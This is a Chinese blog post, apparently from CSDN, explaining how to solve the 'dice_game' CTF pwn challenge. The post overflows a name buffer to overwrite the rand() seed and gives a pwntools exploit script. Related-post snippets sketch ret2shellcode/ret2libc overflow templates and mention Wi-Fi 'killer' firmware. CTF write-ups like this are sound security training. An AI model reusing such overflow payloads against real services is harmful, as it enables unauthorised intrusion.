攻防世界-pwn-dice_game(srand(),rand(),随机数)

最新推荐文章于 2025-05-01 19:24:47 发布
原创 最新推荐文章于 2025-05-01 19:24:47 发布 · 2.3k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #随机数

本文解析了通过逆向工程解决随机数挑战的方法。利用srand和rand函数特性,通过控制随机数种子,实现固定随机数序列,从而在逆向工程游戏中获取flag。

高手进阶区 dice_game

考察知识点:
srand(),rand()函数,产生随机数。
srand和rand()配合使用产生伪随机数序列。
rand函数在产生随机数前,需要系统提供的生成伪随机数序列的种子,rand根据这个种子的值产生一系列随机数。
如果系统提供的种子没有变化,每次调用rand函数生成的伪随机数序列都是一样的。
比如:通常可以利用系统时间来改变系统的种子值,即srand(time(NULL)),可以为rand函数提供不同的种子值,进而产生不同的随机数序列。
如果srand(1),因为1是常数,不会变,所以每次调用rand函数生成的伪随机序列都是一样的。

0x01 题目分析

  1. 直接拖到ida,逆向得到源程序代码
    在这里插入图片描述
    main函数中,有一个read函数,输入name,然后v5=sub_A20函数,要求v5=1才能继续循环,当循环50次后,进入sub_B28函数。
    在这里插入图片描述
    进入sub_A20函数,看到只有输入的值等于随机值,才能使v5=1,继续循环。
    在这里插入图片描述
    循环50次后,进入sub_B28,得到flag。
  2. 做题思路
  • 要想进入sub_B28函数,必须循环50次,而唯一能中断循环的条件就是,必须让v5=1,才能继续循环,
  • 那么就得让随机值=输入值。(这里的随机值序列产生的种子是time,每次调用rand函数都是会变得,所以,这里就要让种子seed不变。)通过read函数输入来覆盖seed值,使其产生的随机数序列不变,然后存到一个列表中,再循环输出,就会使得输入值等于随机值。
  • 要覆盖seed值,就要找其与buf的偏移量。
    在这里插入图片描述
    偏移量为0x50-0x10=0x40,即要想覆盖掉seed,必须前边有0x40的padding。payload=‘a’*0x40+p64(1) ,p64(1)就是覆盖的seed值,种子设为1,随机数序列就不会变。

0x02 exp

from pwn import *
from ctypes import *
r= remote("220.249.52.133",59494)
libc=cdll.LoadLibrary("libc.so.6") 

payload='a'*0x40+p64(1)
r.sendline(payload)

a=[]
for i in range(50):
    a.append(libc.rand()%6+1)
print(a)
for i in a:
    r.recv()
    r.sendline(str(i))
r.interactive()

ctypes是Python内建的用于调用动态链接库函数的功能模块,一定程度上可以用于Python与其他语言的混合编程。由于编写动态链接库,使用C/C++是最常见的方式,故ctypes最常用于Python与C/C++混合编程之中。
rand函数要用cdll中的函数。

攻防世界pwn——dice_game
qq_62076255的博客
12-19 638
攻防世界pwn——dice_game做题记录
攻防世界-pwn dice_game(栈内变量覆盖)
菜的只能随便写写博客
10-09 778
0x01 检查文件  下载附件之后获得两个文件,一个可执行文件和一个libc,初步理解要使用libc。 64位elf 无栈保护 动态链接   0x02 程序分析  根据程序运行分析,程序应该是要求猜数字,连续答对50轮可获得flag。   0x03 IDA结构分析  从里面分析,可以看到程序的结构,while循环里面是猜数字的流程,一共50轮,并可以注意到18行设置了随机数的种子。...
[攻防世界 pwn]——dice_game
Y_peak的博客
02-20 425
[攻防世界 pwn]——dice_game 题目地址: https://adworld.xctf.org.cn/ 题目: 思路 该题和前面的guess_num差不多, 可以点击查看 请点击。这道题是, 利用输入的name将seed覆盖,使得后面产生的随机数不随机。 注意在Linux上面运行, window和Linux上面产生的随机数不一样 exploit from pwn import * from LibcSearcher import * p=remote("111.200.241.244",
攻防世界-dice_game-Writeup
SkYe's Blog
05-13 991
dice_game 题目来源: XCTF 4th-QCTF-2018 考点:栈溢出、混合编程 基本情况 程序实现的是一个具有用户姓名输入的菜随机数程序。 保护措施 Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled 栈溢出 一开始我在纠结是输入数字时使用的是短整型,可不可能是整型溢出,这样既能保持低位数字符合要求,又能控制
攻防世界 Pwn dice_game
MrTreebook的博客
12-18 427
攻防世界 Pwn dice_game1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 没有canary,可能是简单的栈溢出 3.IDA分析 在sub_A20()中可以看出v2是一个通过种子生成的 1~6 的 随机数 之前有做过类似的题,只要控制种子即可预测随机数 在read函数处有栈溢出的漏洞 在下面看到需要连续答对50次才可以获取flag 那么我们构造的思路就是利用这个溢出点覆盖seed从而预测随机数 4.exp from pwn im
精选资源
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
攻防世界-PWN-new_easypwn
aptx4869_li的博客
07-31 3565
攻防世界的格式化字符串漏洞利用,简单题
攻防世界-pwn when_did_you_born(栈覆盖)
菜的只能随便写写博客
08-10 1515
0x01 拿到文件之后,先检查文件的基本信息 文件信息 64bit elf可执行文件 无PIE保护   0x02 执行文件 文件之中有两个输入,第一个输入有回显   0x03 IDA静态分析 可以看出获取flag需要用到v5的值,首先需要v5不等于1926,进入else这个块之中,然后又需要v5等于1926才能获取flag,就产生了矛盾。 结合程序有两个输入,可以考...
攻防世界 dice_game
最新发布
2401_88087539的博客
05-01 384
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
攻防世界高手进阶区——dice_game
weixin_62675330的博客
02-19 2580
攻防世界高手进阶区——dice_game 题目里面啥都没有。 一.分析文件 checksec 只有栈溢出保护关闭了,其他都是开着的。 运行 可以看出是要猜数字,猜对50次。 ida逆向 __int64 __fastcall main(int a1, char **a2, char **a3) { char buf[55]; // [rsp+0h] [rbp-50h] BYREF char v5; // [rsp+37h] [rbp-19h] ssize_t v6; // [
攻防世界(Pwn)dice_game, 栈溢出覆盖srand种子
半岛铁盒的博客
03-05 1552
说明 这其实是一种类型题,新手刚开始会碰到,题目大致过程是 有个srand()的随机函数.需要覆盖 seed种子 即srand(seed) 把 seed 覆盖为一个固定的数 , srand 就是伪随机函数了, 题目会有个猜数循 环,比如猜对了20次flag就有了,和这道题类似的题目还有新手区的guess_num 解题 点进去read中的 buf; EXp from pwn import * from ctypes import * p=remote('111.200.241.244','38
攻防世界dice_game(pwn)
CTF小白的博客
05-08 4897
dice_game 题目考察:rand()生成的随机数和随机种子seed()有关,通过观察题目,可以发现存在溢出漏洞,通过输入可以覆盖到seed(),实现一个可预测的随机数列。 题目分析 这边就可以看到,buf覆盖0x40位就能覆盖到seed。 sub_A20()如下,就是比较你输入的数是否和产生的随机数相等。 当回答正确50次时,会执行sub_B28这个函数,读取flag。 所以我们要做...
功防世界dice_game
weixin_34190136的博客
05-03 346
buf 长度最长为 0x50 但是当输入大于 49 的时候不会被截断,所以我们只要覆盖到之前的 seed 就可以为所欲为了。 同时注意到 seed 跟 buf 相差的偏移是 0x40,所以只要 68 个字符就可以溢出覆盖 seed 了。 Exploit 由于担心 python 的 randint 实现跟 libc 的不太一样,所以我写了个小程序 在vim编译运行.c文件步骤:...
pwn篇:随机数种子
weixin_44644249的博客
02-02 1268
攻防世界pwn进阶:dice_game 程序分析: 64位elf可执行文件、libc.so.6库文件 保护:除了Canary,其他保护全开 IDA分析程序逻辑 创建一个随机数种子,为当前时间 首先输入名字,长度为55的数组。程序对输入做了处理,当大于49长度时,将最后一个赋值为“0x00”,也就是对字符串长度进行了限制,这个函数没什么问题。 打印输入的字符串,这里也没什么问题。 调用了srand函数,seed是输入名字时字符串第0x41个元素,也就是该值可控。 SUB_A20函数对随机数进行了处理,
攻防世界 PWN 高手进阶 dice_game (write up)
qq_44768749的博客
08-18 568
攻防世界 PWN 高手进阶 dice_gamedice_game0x01 查看保护机制0x02 反汇编main:sub_A20():sub_B28():0x03利用过程功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 dice_ga
pwn_dice_game
weixin_44464829的博客
10-31 345
常规操作:checksec dice_game 发现文件是64位 放入ida中看c的伪代码: 这是一个猜数字的题,之前有做过类似的题,目的是覆盖seed,使随机数不再随机产生 点开sub_A20()看看随机数怎么构造的: 可以看到rand()%6+1线性同余的方式生成随机数,下一步就是想要覆盖掉种子位置上的值 看一下种子的位置: buf是我们可以写 入数据的缓冲区,通过read函数写入,这又是经典的栈溢出漏洞 0x50-0x10=0x40 因为附件解压后有两个文件,其中一个是l
pwn dice_game
weixin_44319142的博客
05-02 603
dice_game 又是seed from pwn import * from ctypes import * context.log_level='debug' libc = cdll.LoadLibrary("libc.so.6") p = process('./dice_game') #p = remote("111.198.29.45",56813) p.recvuntil(" ...
攻防世界 dice_game栈溢出+随机数
fanghuapyk的博客
03-19 299
攻防世界 dice_game栈溢出+随机数 检查保护 发现是64位程序,并且开启了NX保护和地址随机化 上ida 发现flag敏感字符,追踪发现sub_B28函数里面可以直接得到flag 这里解释一下 Fopen函数: FILE *fopen(char *filename, char *mode); filename为文件名(包括文件路径),mode为打开方式,它们都是字符串。 Fget函数: 函数原型 char *fgets(char *str, int n, FILE *stream); 参数:
xctf 攻防世界-dicegame writeup
qq_43189757的博客
07-07 478
比较容易发现可以对buf进行缓冲区溢出,继续往下看 可以发现获得flag的条件是循环50次,50次输入的v1值与随机数v2 都相等 根据前面发现的缓冲区溢出可以发现我们可以覆盖掉seed种子值 那么种子值可以被我们随意设置为一个任意值,我把它设置为0,有了种子值可以写一个c程序把50次产生的随机数都求出来 有了随机数便可以编写exp了 C程序: #include <stdio.h&...
攻防世界pwn pwn-100
01-18
### 关于攻防世界PWN-100题目的解答 #### 解决方案概述 对于攻防世界PWN-100题目,通常涉及的是基础的缓冲区溢出攻击。这类题目旨在测试参赛者对Linux防护机制的理解程度以及绕过这些保护措施的能力。常见的技术包括但不限于返回导向编程(Return-Oriented Programming, ROP)、重定向到已知位置的shellcode执行(ret2shellcode)或是利用动态链接库中的函数实现系统命令调用(ret2libc)[^1]。 #### 技术细节 当面对没有启用地址空间布局随机化(ASLR)且未开启不可执行堆栈(NX bit off)的情况时,可以直接采用`ret2shellcode`的方式解决问题。此方法要求选手能够找到足够的空间放置自定义的shellcode,并通过控制EIP指向这段代码来完成最终的目标——通常是打开一个远程shell连接给攻击者[^3]。 如果遇到开启了NX位但是禁用了位置独立可执行文件(PIE),那么可以考虑使用`ret2libc`策略。这种方法依赖于将返回地址设置为标准C库(glibc)内的某个有用功能的位置,比如system()函数,从而间接地触发所需的恶意操作而无需注入新的机器码片段。 针对具体环境下的不同情况,还需要掌握诸如IDA Pro这样的反汇编工具来进行二进制分析工作;同时熟悉GDB调试技巧以便更好地理解程序内部逻辑并定位潜在的安全漏洞所在之处。 ```python from pwn import * # 连接到远程服务 conn = remote('challenge.ctf.games', PORT) # 发送payload前先接收初始消息 print(conn.recvline()) # 构造payload offset = 64 # 假设偏移量为64字节 junk = b'A' * offset return_address = pack('<I', 0xdeadbeef) # 替换为目标地址 exploit_payload = junk + return_address # 发送payload conn.send(exploit_payload) # 接收响应数据 result = conn.recvall() print(result.decode()) ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值